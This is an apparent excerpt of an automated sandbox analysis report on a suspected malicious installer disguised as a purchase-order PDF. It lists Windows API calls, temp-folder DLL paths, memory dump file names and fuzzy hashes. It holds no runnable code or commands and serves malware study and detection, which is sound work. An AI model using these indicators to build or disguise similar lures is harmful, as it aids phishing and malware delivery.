                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                    • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                    • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                                                    • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                    • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(?), ref: 00401D59
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                    • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                    • String ID: Calibri
                                                                                                                                    • API String ID: 3808545654-1409258342
                                                                                                                                    • Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                                                    • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                                                    • Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                                                    • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                                                    APIs
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                                                      • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2206700289.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2206687623.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206712677.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206725097.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4216380887-0
                                                                                                                                    • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                                    • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                                                    • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                                    • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2206700289.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2206687623.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206712677.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206725097.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                    • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                                    • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                                                    • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                                    • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                    • Opcode ID: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                                                    • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                                                    • Opcode Fuzzy Hash: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                                                    • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                                                    APIs
                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsd51BE.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsd51BE.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd51BE.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsd51BE.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsd51BE.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWidelstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsd51BE.tmp$C:\Users\user\AppData\Local\Temp\nsd51BE.tmp\System.dll
                                                                                                                                    • API String ID: 3109718747-3370600196
                                                                                                                                    • Opcode ID: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                                                    • Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
                                                                                                                                    • Opcode Fuzzy Hash: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                                                    • Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2206700289.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2206687623.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206712677.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206725097.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeGlobal
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2979337801-0
                                                                                                                                    • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                                    • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                                                    • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                                    • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                    • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                    • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                                                    • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                    • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                                                    APIs
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                    • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2206700289.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2206687623.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206712677.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2206725097.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1148316912-0
                                                                                                                                    • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                    • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                    • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                    • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                    • Opcode ID: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                                                    • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                                                    • Opcode Fuzzy Hash: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                                                    • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                    • wsprintfW.USER32 ref: 00404A1A
                                                                                                                                    • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                    • Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                                                    • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                                                    • Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                                                    • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                                                    APIs
                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                    • String ID: !
                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                    • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                    • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                                                    • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                    • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204672986.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                    • String ID: Call
                                                                                                                                    • API String ID: 3677997916-1824292864
                                                                                                                                    • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                    • Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
                                                                                                                                    • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                    • Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
                                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2204558947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2204544502.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204575832.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2204590264.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
